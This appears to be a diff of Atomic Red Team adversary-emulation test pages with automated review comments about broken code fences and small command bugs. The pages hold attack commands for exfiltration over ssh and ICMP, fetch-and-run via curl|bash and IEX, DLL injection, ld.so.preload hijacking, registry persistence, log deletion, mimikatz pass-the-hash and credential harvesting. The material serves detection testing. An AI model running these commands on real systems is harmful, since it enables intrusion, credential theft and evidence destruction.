+#### Run it with `command_prompt`! ```
wmic process get caption,executablepath,commandline
```
@@ -49,8 +47,7 @@ WMI List Software
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
wmic qfe get description,installedOn /format:csv
```
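Review bot: The heading says "WMI List Software" but `wmic qfe` enumerates installed hotfixes and updates, not applications. Either retitle the test to hotfix enumeration or switch to the product class, keeping in mind that `wmic product` triggers a consistency check of every MSI package on the host, which is slow and noisy.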
@@ -68,8 +65,7 @@ WMI List Remote Services
| node | Ip Address | String | 192.168.0.1|
| service_search_string | Name Of Service | String | sql server|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
wmic /node:"#{node}" service where (caption like "%#{service_search_string} (%")
```
diff --git a/atomics/T1048/T1048.md b/atomics/T1048/T1048.md
index 902d12e8..9e515de1 100644
--- a/atomics/T1048/T1048.md
+++ b/atomics/T1048/T1048.md
@@ -30,8 +30,7 @@ Remote to Local
| user_name | username for domain | string | atomic|
| password | password for user | string | atomic|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
ssh #{domain} "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz
```
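Review bot: The input table in this hunk declares `user_name` and `password` but the command only substitutes `#{domain}`, so `ssh #{domain}` connects as the local user and the documented credentials are never used. Use `ssh #{user_name}@#{domain}` as the next test does, or remove the unused inputs.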
@@ -52,8 +51,7 @@ Local to Remote
| user_name | username for domain | string | atomic|
| password | password for user | string | atomic|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh #{user_name}@#{domain} 'cat > /Users.tar.gz.enc'
```
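Review bot: `openssl des3 -salt -pass #{password}` will fail with an invalid password argument: `-pass` expects a source prefix such as `pass:#{password}`, `env:VAR` or `file:path`, not a bare string. Given the default value `atomic`, the command should read `-pass pass:#{password}`.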
@@ -65,8 +63,7 @@ A firewall rule (iptables or firewalld) will be needed to allow exfiltration on
**Supported Platforms:** macOS, CentOS, Ubuntu, Linux
-#### Run it with these steps!
-1. Victim System Configuration:
+#### Run it with these steps! 1. Victim System Configuration:
mkdir /tmp/victim-staging-area
echo "this file will be exfiltrated" > /tmp/victim-staging-area/victim-file.txt
@@ -96,8 +93,7 @@ Exfiltration of specified file over ICMP protocol.
| input_file | Path to file to be exfiltrated. | Path | C:\Windows\System32\notepad.exe|
| ip_address | Destination IP address where the data should be sent. | String | 1.1.1.1|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
$ping = New-Object System.Net.Networkinformation.ping; foreach($Data in Get-Content -Path #{input_file} -Encoding Byte -ReadCount 1024) { $ping.Send("#{ip_address}", 1500, $Data) }
```
diff --git a/atomics/T1049/T1049.md b/atomics/T1049/T1049.md
index 320c6ca0..14f996f3 100644
--- a/atomics/T1049/T1049.md
+++ b/atomics/T1049/T1049.md
@@ -27,8 +27,7 @@ Get a listing of network connections.
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
netstat
net use
net sessions
@@ -42,8 +41,7 @@ Get a listing of network connections.
**Supported Platforms:** Windows
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
Get-NetTCPConnection
```
@@ -55,8 +53,7 @@ Get a listing of network connections.
**Supported Platforms:** Linux, macOS
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
netstat
who -a
```
diff --git a/atomics/T1050/T1050.md b/atomics/T1050/T1050.md
index c14e323d..48737b6c 100644
--- a/atomics/T1050/T1050.md
+++ b/atomics/T1050/T1050.md
@@ -25,8 +25,7 @@ Installs A Local Service
| binary_path | Name of the service binary, include path. | Path | C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe|
| service_name | Name of the Service | String | AtomicTestService|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
sc.exe create #{service_name} binPath= #{binary_path}
sc.exe start #{service_name}
sc.exe stop #{service_name}
@@ -47,8 +46,7 @@ Installs A Local Service via PowerShell
| binary_path | Name of the service binary, include path. | Path | C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe|
| service_name | Name of the Service | String | AtomicTestService|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
New-Service -Name "#{service_name}" -BinaryPathName "#{binary_path}"
Start-Service -Name "#{service_name}"
Stop-Service -Name "#{service_name}"
diff --git a/atomics/T1053/T1053.md b/atomics/T1053/T1053.md
index 2128963e..c7e828e2 100644
--- a/atomics/T1053/T1053.md
+++ b/atomics/T1053/T1053.md
@@ -22,8 +22,7 @@ Note: deprecated in Windows 8+
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
at 13:20 /interactive cmd
```
@@ -40,8 +39,7 @@ at 13:20 /interactive cmd
| task_command | What you want to execute | String | C:\windows\system32\cmd.exe|
| time | What time 24 Hour | String | 72600|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}
```
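Review bot: The `time` input defaults to `72600`, which is not a valid value for `SCHTASKS /ST`; that switch expects 24-hour `HH:mm` (for example `07:26`). The test will fail at creation time until the default is corrected, and the description column should state the expected format.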
@@ -62,8 +60,7 @@ Create a task on a remote system
| user_name | Username DOMAIN\User | String | DOMAIN\user|
| password | Password | String | At0micStrong|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
```
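Review bot: all three hunks in T1053.md put ``` at the end of the heading line instead of on its own line, so none of the at / SCHTASKS commands will render as code and every following closing ``` opens a stray fence. Keep the fence on a separate line, as in the removed lines. Since the third test substitutes a password into the command line (/RP #{password}), it is worth keeping that block rendered as code so readers do not mistake the placeholder for prose.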
diff --git a/atomics/T1055/T1055.md b/atomics/T1055/T1055.md
index 84785962..cc1b4048 100644
--- a/atomics/T1055/T1055.md
+++ b/atomics/T1055/T1055.md
@@ -48,8 +48,7 @@ Windows 10 Utility To Inject DLLS
| dll_payload | DLL to Inject | Path | C:\AtomicRedTeam\atomics\T1055\src\x64\T1055.dll|
| process_id | PID of input_arguments | Int | $pid|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
mavinject $pid /INJECTRUNNING #{dll_payload}
```
@@ -67,8 +66,7 @@ PowerShell Injection using [PowerSploit Invoke-DLLInjection](https://github.com/
| dll_payload | DLL to Inject | Path | T1055.dll|
| process_id | PID of input_arguments | Int | $pid|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
Invoke-DllInjection.ps1 -ProcessID #{process_id} -Dll #{dll_payload}
```
@@ -85,8 +83,7 @@ This test adds a shared library to the `ld.so.preload` list to execute and inter
|------|-------------|------|---------------|
| path_to_shared_library | Path to a shared library object | Path | /tmp/evil_module.so|
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
echo #{path_to_shared_library} > /etc/ld.so.preload
```
@@ -110,8 +107,7 @@ Excercises Five Techniques
|------|-------------|------|---------------|
| exe_binary | Output Binary | Path | T1055.exe|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
.\bin\#{exe_binary}
```
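Review bot: each of the four hunks in T1055.md collapses the opening fence into the heading (+#### Run it with `powershell`! ```, `bash`, `command_prompt`), which Markdown does not treat as a fence opener; the mavinject, Invoke-DllInjection, ld.so.preload and .\bin\ lines lose their code formatting and the unchanged closing fences start new, unintended code blocks. Restore the fence as its own line after each heading.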
diff --git a/atomics/T1056/T1056.md b/atomics/T1056/T1056.md
index 7194584c..63326f2d 100644
--- a/atomics/T1056/T1056.md
+++ b/atomics/T1056/T1056.md
@@ -28,8 +28,7 @@ Provided by [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/blob/ma
|------|-------------|------|---------------|
| filepath | Name of the local file, include path. | Path | c:\key.log|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
.\Get-Keystrokes.ps1 -LogPath #{filepath}
```
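Review bot: the + line here (+#### Run it with `powershell`! ```) is a heading ending in three backticks, not a heading followed by a code fence, so .\Get-Keystrokes.ps1 -LogPath #{filepath} will render as paragraph text and the closing ``` that follows it will open a fence instead of closing one. Keep the heading and the ``` on separate lines.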
diff --git a/atomics/T1057/T1057.md b/atomics/T1057/T1057.md
index 15500c54..2fbca057 100644
--- a/atomics/T1057/T1057.md
+++ b/atomics/T1057/T1057.md
@@ -28,8 +28,7 @@ Utilize ps to identify processes
|------|-------------|------|---------------|
| output_file | path of output file | path | /tmp/loot.txt|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
ps >> #{output_file}
ps aux >> #{output_file}
```
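Review bot: moving ``` onto the heading line (+#### Run it with `sh`! ```) breaks the code block for the two ps commands; a fence only opens when the backticks begin a line, so the block is no longer rendered as code and the trailing closing ``` becomes an opener. Put the fence back on its own line.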
diff --git a/atomics/T1059/T1059.md b/atomics/T1059/T1059.md
index 77853262..40c6db1f 100644
--- a/atomics/T1059/T1059.md
+++ b/atomics/T1059/T1059.md
@@ -19,8 +19,7 @@ This will download the specified payload and set a marker file in `/tmp/art-fish
**Supported Platforms:** macOS, CentOS, Ubuntu, Linux
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
bash -c "curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059/echo-art-fish.sh | bash"
bash -c "wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Atomics/T1059/echo-art-fish.sh | bash"
```
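Review bot: the merged heading/fence line (+#### Run it with `sh`! ```) leaves the two bash -c lines unfenced and turns the following closing ``` into an opening fence. Keep ``` on its own line. Separately, the unchanged wget line fetches .../master/Atomics/T1059/echo-art-fish.sh while the curl line uses .../atomics/T1059/...; raw GitHub paths are case-sensitive, so the two commands do not point at the same file and the capitalised one should be corrected to atomics.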
diff --git a/atomics/T1060/T1060.md b/atomics/T1060/T1060.md
index 22e08567..638e038b 100644
--- a/atomics/T1060/T1060.md
+++ b/atomics/T1060/T1060.md
@@ -42,8 +42,7 @@ Run Key Persistence
|------|-------------|------|---------------|
| command_to_execute | Thing to Run | Path | C:\Path\AtomicRedTeam.exe|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /t REG_SZ /F /D "#{command_to_execute}"
REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /f
```
@@ -61,8 +60,7 @@ RunOnce Key Persistence
|------|-------------|------|---------------|
| thing_to_execute | Thing to Run | Path | C:\Path\AtomicRedTeam.dll|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "#{thing_to_execute}"
REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f
```
@@ -80,8 +78,7 @@ RunOnce Key Persistence via PowerShell
|------|-------------|------|---------------|
| thing_to_execute | Thing to Run | Path | powershell.exe|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
$RunOnceKey = "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce"
set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat`")"'
Remove-ItemProperty -Path $RunOnceKey -Name "NextRun" -Force
@@ -100,8 +97,7 @@ Add Shortcut To Startup via PowerShell
|------|-------------|------|---------------|
| thing_to_execute | Thing to Run | Path | C:\Path\AtomicRedTeam.exe|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
$TargetFile = "$env:SystemRoot\System32\#{thing_to_execute}"
$ShortcutFile = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Notepad.lnk"
$WScriptShell = New-Object -ComObject WScript.Shell
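Review bot: all four hunks in T1060.md (+#### Run it with `command_prompt`! ``` and the powershell variants) attach the opening fence to the heading, which is not valid fence syntax; the REG ADD/REG DELETE pairs and the $RunOnceKey / $TargetFile scripts will render as prose, and each unchanged closing ``` will open a fence that swallows the next test's text. Keep the fence as a separate line after each heading.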
diff --git a/atomics/T1062/T1062.md b/atomics/T1062/T1062.md
index 2ad7a808..c32bc853 100644
--- a/atomics/T1062/T1062.md
+++ b/atomics/T1062/T1062.md
@@ -24,8 +24,7 @@ Create a New-VM
| vm_name | Create a new VM. | string | testvm|
| file_location | Location of new VHDX file | string | C:\Temp\test.vhdx|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
Get-WindowsFeature -Name Hyper-V -ComputerName #{hostname}
Install-WindowsFeature -Name Hyper-V -ComputerName #{hostname} -IncludeManagementTools
New-VM -Name #{vm_name} -MemoryStartupBytes 1GB -NewVHDPath #{file_location} -NewVHDSizeBytes 21474836480
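Review bot: the + line (+#### Run it with `powershell`! ```) does not open a code block, so the Get-WindowsFeature / Install-WindowsFeature / New-VM lines render as a paragraph and the block's closing fence becomes an opener. Keep ``` on its own line below the heading.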
diff --git a/atomics/T1063/T1063.md b/atomics/T1063/T1063.md
index ec6b93b5..1a7bdae2 100644
--- a/atomics/T1063/T1063.md
+++ b/atomics/T1063/T1063.md
@@ -29,8 +29,7 @@ Methods to identify Security Software on an endpoint
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
netsh.exe advfirewall firewall show all profiles
tasklist.exe
tasklist.exe | findstr /i virus
@@ -47,8 +46,7 @@ Methods to identify Security Software on an endpoint
**Supported Platforms:** Windows
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
get-process | ?{$_.Description -like "*virus*"}
get-process | ?{$_.Description -like "*carbonblack*"}
get-process | ?{$_.Description -like "*defender*"}
@@ -63,8 +61,7 @@ Methods to identify Security Software on an endpoint
**Supported Platforms:** Linux, macOS
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
ps -ef | grep Little\ Snitch | grep -v grep
ps aux | grep CbOsxSensorService
```
@@ -77,8 +74,7 @@ Discovery of an installed Sysinternals Sysmon service using driver altitude (eve
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
fltmc.exe | findstr.exe 385201
```
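Review bot: each of the four hunks in T1063.md (command_prompt, powershell, sh, command_prompt) ends the heading with ```, which Markdown reads as inline text rather than a fence; the netsh/tasklist, get-process, ps | grep and fltmc.exe blocks lose their code formatting and the unchanged closing fences open new blocks. Revert to a separate ``` line after each heading.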
diff --git a/atomics/T1064/T1064.md b/atomics/T1064/T1064.md
index 7a363f99..fe2bda2b 100644
--- a/atomics/T1064/T1064.md
+++ b/atomics/T1064/T1064.md
@@ -19,8 +19,7 @@ Creates and executes a simple bash script.
**Supported Platforms:** macOS, Linux
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
sh -c "echo 'echo Hello from the Atomic Red Team' > /tmp/art.sh"
sh -c "echo 'ping -c 4 8.8.8.8' >> /tmp/art.sh"
chmod +x /tmp/art.sh
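Review bot: the + line (+#### Run it with `sh`! ```) leaves the sh -c / chmod lines outside any code block and flips the meaning of the closing ``` below them. A fence has to start a line; keep the heading and the fence on separate lines.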
diff --git a/atomics/T1065/T1065.md b/atomics/T1065/T1065.md
index 89643389..4fa3d0a2 100644
--- a/atomics/T1065/T1065.md
+++ b/atomics/T1065/T1065.md
@@ -23,8 +23,7 @@ Testing uncommonly used port utilizing PowerShell
| port | Specify uncommon port number | String | 8081|
| domain | Specify target hostname | String | google.com|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
test-netconnection -ComputerName #{domain} -port #{port}
```
@@ -42,8 +41,7 @@ Testing uncommonly used port utilizing telnet.
| port | Specify uncommon port number | String | 8081|
| domain | Specify target hostname | String | google.com|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
telnet #{domain} #{port}
```
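Review bot: both hunks in T1065.md merge the opening fence into the heading (+#### Run it with `powershell`! ``` and `sh`), so test-netconnection and telnet render as plain text and the remaining closing fences open stray code blocks. Keep ``` on its own line.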
diff --git a/atomics/T1069/T1069.md b/atomics/T1069/T1069.md
index c3914d2a..b07a9673 100644
--- a/atomics/T1069/T1069.md
+++ b/atomics/T1069/T1069.md
@@ -31,8 +31,7 @@ Permission Groups Discovery
**Supported Platforms:** macOS, Linux
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
dscacheutil -q group
dscl . -list /Groups
groups
@@ -46,8 +45,7 @@ Permission Groups Discovery for Windows
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
net localgroup
net group /domain
```
@@ -65,8 +63,7 @@ Permission Groups Discovery utilizing PowerShell
|------|-------------|------|---------------|
| user | User to identify what groups a user is a member of | string | administrator|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
get-localgroup
get-ADPrinicipalGroupMembership #{user} | select name
```
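Review bot: all three hunks in T1069.md put the opening ``` at the end of the heading line, which is not a fence opener; the dscl/groups, net localgroup and get-localgroup blocks lose their code formatting and the following closing fences become openers. Keep the fence on a separate line. While here, the unchanged line get-ADPrinicipalGroupMembership misspells the cmdlet; it should be Get-ADPrincipalGroupMembership or the command fails with a not-recognized error.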
diff --git a/atomics/T1070/T1070.md b/atomics/T1070/T1070.md
index b3b14332..4dbc93ea 100644
--- a/atomics/T1070/T1070.md
+++ b/atomics/T1070/T1070.md
@@ -44,8 +44,7 @@ Clear Windows Event Logs
|------|-------------|------|---------------|
| log_name | Windows Log Name, ex System | String | System|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
wevtutil cl #{log_name}
```
@@ -57,8 +56,7 @@ Manages the update sequence number (USN) change journal, which provides a persis
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
fsutil usn deletejournal /D C:
```
@@ -70,8 +68,7 @@ Delete system and audit logs
**Supported Platforms:** macOS, Linux
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
rm -rf /private/var/log/system.log*
rm -rf /private/var/audit/*
```
@@ -89,8 +86,7 @@ This test overwrites the Linux mail spool of a specified user. This technique wa
|------|-------------|------|---------------|
| username | Username of mail spool | String | root|
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
echo 0> /var/spool/mail/#{username}
```
@@ -107,8 +103,7 @@ This test overwrites the specified log. This technique was used by threat actor
|------|-------------|------|---------------|
| log_path | Path of specified log | Path | /var/log/secure|
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
echo 0> #{log_path}
```
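Review bot: all five hunks in T1070.md (command_prompt, command_prompt, sh, bash, bash) attach ``` to the heading line, so wevtutil, fsutil, the rm -rf lines and both echo 0> commands will render as prose while each unchanged closing ``` opens an unintended fence. Restore the fence as its own line after each heading.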
diff --git a/atomics/T1071/T1071.md b/atomics/T1071/T1071.md
index f8dcf6f8..4af8746c 100644
--- a/atomics/T1071/T1071.md
+++ b/atomics/T1071/T1071.md
@@ -31,8 +31,7 @@ Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/m
|------|-------------|------|---------------|
| domain | Default domain to simulate against | string | www.google.com|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
Invoke-WebRequest #{domain} -UserAgent "HttpBrowser/1.0" | out-null
Invoke-WebRequest #{domain} -UserAgent "Wget/1.9+cvs-stable (Red Hat modified)" | out-null
Invoke-WebRequest #{domain} -UserAgent "Opera/8.81 (Windows NT 6.0; U; en)" | out-null
@@ -53,8 +52,7 @@ Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/m
|------|-------------|------|---------------|
| domain | Default domain to simulate against | string | www.google.com|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
curl -s -A "HttpBrowser/1.0" -m3 #{domain}
curl -s -A "Wget/1.9+cvs-stable (Red Hat modified)" -m3 #{domain}
curl -s -A "Opera/8.81 (Windows NT 6.0; U; en)" -m3 #{domain}
@@ -78,8 +76,7 @@ The intent of this test is to trigger threshold based detection on the number of
| query_type | DNS query type | string | TXT|
| query_volume | Number of DNS queries to send | integer | 1000|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
for($i=0; $i -le $#{query_volume}; $i++) { Resolve-DnsName -type "#{query_type}" "#{subdomain}.$(Get-Random -Minimum 1 -Maximum 999999).#{domain}" -QuickTimeout}
```
@@ -102,8 +99,7 @@ This behaviour is typical of implants either in an idle state waiting for instru
| c2_jitter | Percentage of jitter to add to the C2 interval to create variance in the times between C2 requests | integer | 20|
| runtime | Time in minutes to run the simulation | integer | 30|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
.\T1071-dns-beacon.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type} -C2Interval #{c2_interval} -C2Jitter #{c2_jitter} -RunTime #{runtime}
```
@@ -123,8 +119,7 @@ The simulation involves sending DNS queries that gradually increase in length un
| subdomain | Subdomain prepended to the domain name (should be 63 characters to test maximum length) | string | atomicredteamatomicredteamatomicredteamatomicredteamatomicredte|
| query_type | DNS query type | string | TXT|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
.\T1071-dns-domain-length.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type}
```
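Review bot: each of the five hunks in T1071.md ends the heading with ``` instead of placing the fence on the next line, so the Invoke-WebRequest, curl, for loop and .\T1071-dns-*.ps1 blocks all lose their code formatting and the unchanged closing fences open stray blocks. Keep ``` on its own line. Also, in the unchanged for loop, $#{query_volume} expands to $1000, a PowerShell variable reference rather than the number, so the loop bound is an undefined variable instead of the configured query volume; drop the leading $ so the substituted literal is used.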
diff --git a/atomics/T1074/T1074.md b/atomics/T1074/T1074.md
index e285a19a..1e80f23f 100644
--- a/atomics/T1074/T1074.md
+++ b/atomics/T1074/T1074.md
@@ -19,8 +19,7 @@ Utilize powershell to download discovery.bat and save to a local file
**Supported Platforms:** Windows
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
"IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat')" > c:\windows\pi.log
```
@@ -32,8 +31,7 @@ Utilize curl to download discovery.sh and execute a basic information gathering
**Supported Platforms:** Linux, macOS
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/Discovery.sh | bash -s > /tmp/discovery.log
```
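Review bot: both hunks in T1074.md (+#### Run it with `powershell`! ``` and `bash`) break the code blocks: the backticks at the end of a heading are literal text, so the IEX and curl | bash lines render as paragraphs and the following closing fences become openers. Keep the fence on its own line.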
diff --git a/atomics/T1075/T1075.md b/atomics/T1075/T1075.md
index 49c3ee8b..8f4e0705 100644
--- a/atomics/T1075/T1075.md
+++ b/atomics/T1075/T1075.md
@@ -25,8 +25,7 @@ Note: must dump hashes first
| domain | domain | string | atomic.local|
| ntlm | ntlm hash | string | cc36cf7a8514893efccd3324464tkg1a|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
mimikatz # sekurlsa::pth /user:#{user_name} /domain:#{domain} /ntlm:#{ntlm}
```
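Review bot: the + line (+#### Run it with `command_prompt`! ```) removes the fence that wrapped the mimikatz # sekurlsa::pth line; with the backticks on the heading line the command renders as prose and the closing ``` opens a new block. Keep the heading and the fence as two lines.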
diff --git a/atomics/T1076/T1076.md b/atomics/T1076/T1076.md
index eb583189..3af227f1 100644
--- a/atomics/T1076/T1076.md
+++ b/atomics/T1076/T1076.md
@@ -19,8 +19,7 @@ RDP hijacking](https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-r
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
query user
sc.exe create sesshijack binpath= "cmd.exe /k tscon 1337 /dest:rdp-tcp#55"
net start sesshijack
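Review bot: the + line (+#### Run it with `command_prompt`! ```) is not a fence opener, so query user, sc.exe create and net start will render as plain text and the block's closing fence turns into an opener for whatever follows. Keep ``` on its own line below the heading.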
diff --git a/atomics/T1077/T1077.md b/atomics/T1077/T1077.md
index 4ec1de97..70ff3218 100644
--- a/atomics/T1077/T1077.md
+++ b/atomics/T1077/T1077.md
@@ -29,8 +29,7 @@ Connecting To Remote Shares
| password | Password | String | P@ssw0rd1|
| computer_name | Target Computer Name | String | Target|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}"
```
@@ -49,8 +48,7 @@ Map Admin share utilizing PowerShell
| computer_name | Target Computer Name | String | Target|
| map_name | Mapped Drive Letter | String | g|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name}
```
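Review bot: both hunks in T1077.md fold the opening ``` into the heading line, leaving the net use and New-PSDrive commands unfenced and turning the unchanged closing fences into openers. Revert to heading, then ``` on its own line.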
diff --git a/atomics/T1081/T1081.md b/atomics/T1081/T1081.md
index 178e0ad5..1a17db37 100644
--- a/atomics/T1081/T1081.md
+++ b/atomics/T1081/T1081.md
@@ -23,8 +23,7 @@ It is possible to extract passwords from backups or saved virtual machines throu
**Supported Platforms:** macOS
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
python2 laZagne.py all
```
@@ -41,8 +40,7 @@ Extracting credentials from files
|------|-------------|------|---------------|
| file_path | Path to search | String | /|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
grep -riP password #{file_path}
```
@@ -54,8 +52,7 @@ Mimikatz/kittenz - This will require a Mimikatz executable or invoke-mimikittenz
**Supported Platforms:** Windows
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
invoke-mimikittenz
mimikatz.exe
```
@@ -68,8 +65,7 @@ Extracting Credentials from Files
**Supported Platforms:** Windows
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
findstr /si pass *.xml | *.doc | *.txt | *.xls
ls -R | select-string -Pattern password
```
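Review bot: all four hunks in T1081.md end the heading with ``` rather than starting a fence on the next line, so none of the python2 laZagne.py, grep, invoke-mimikittenz or findstr/select-string lines render as code and each following closing fence opens a stray block. Keep the fence on a separate line.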
diff --git a/atomics/T1082/T1082.md b/atomics/T1082/T1082.md
index de37361f..b979ad10 100644
--- a/atomics/T1082/T1082.md
+++ b/atomics/T1082/T1082.md
@@ -31,8 +31,7 @@ Identify System Info
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
systeminfo
reg query HKLM\SYSTEM\CurrentControlSet\Services\Disk\Enum
```
@@ -45,8 +44,7 @@ Identify System Info
**Supported Platforms:** Linux, macOS
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
systemsetup
system_profiler
ls -al /Applications
@@ -60,8 +58,7 @@ Identify System Info
**Supported Platforms:** Linux, macOS
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
uname -a >> /tmp/loot.txt
cat /etc/lsb-release >> /tmp/loot.txt
cat /etc/redhat-release >> /tmp/loot.txt
@@ -77,8 +74,7 @@ Identify virtual machine hardware. This technique is used by the Pupy RAT and ot
**Supported Platforms:** Linux
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
cat /sys/class/dmi/id/bios_version | grep -i amazon
cat /sys/class/dmi/id/product_name | grep -i "Droplet\|HVM\|VirtualBox\|VMware"
cat /sys/class/dmi/id/chassis_vendor | grep -i "Xen\|Bochs\|QEMU"
@@ -97,8 +93,7 @@ Identify virtual machine guest kernel modules. This technique is used by the Pup
**Supported Platforms:** Linux
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
sudo lsmod | grep -i "vboxsf\|vboxguest"
sudo lsmod | grep -i "vmw_baloon\|vmxnet"
sudo lsmod | grep -i "xen-vbd\|xen-vnif"
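Review bot: each of the five hunks in T1082.md attaches ``` to the heading line, which Markdown treats as literal text, so the systeminfo/reg query, systemsetup, uname/cat and both lsmod blocks lose their code formatting and every unchanged closing fence opens a new block. Keep the fence on its own line. Also, in the unchanged last hunk, the module name is vmw_balloon, not vmw_baloon, so that grep pattern will never match the VMware balloon driver.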
diff --git a/atomics/T1083/T1083.md b/atomics/T1083/T1083.md
index 9ca89f5c..64081726 100644
--- a/atomics/T1083/T1083.md
+++ b/atomics/T1083/T1083.md
@@ -29,8 +29,7 @@ Find or discover files on the file system
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
dir /s c:\ >> %temp%\download
dir /s "c:\Documents and Settings" >> %temp%\download
dir /s "c:\Program Files\" >> %temp%\download
@@ -49,8 +48,7 @@ Find or discover files on the file system
**Supported Platforms:** Windows
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
ls -recurse
get-childitem -recurse
gci -recurse
@@ -70,8 +68,7 @@ https://perishablepress.com/list-files-folders-recursively-terminal/
**Supported Platforms:** macOS, Linux
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
ls -a > allcontents.txt
ls -la /Library/Preferences/ > detailedprefsinfo.txt
file */* *>> ../files.txt
@@ -89,8 +86,7 @@ Find or discover files on the file system
**Supported Platforms:** macOS, Linux
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
cd $HOME && find . -print | sed -e 's;[^/]*/;|__;g;s;__|; |;g' > /tmp/loot.txt
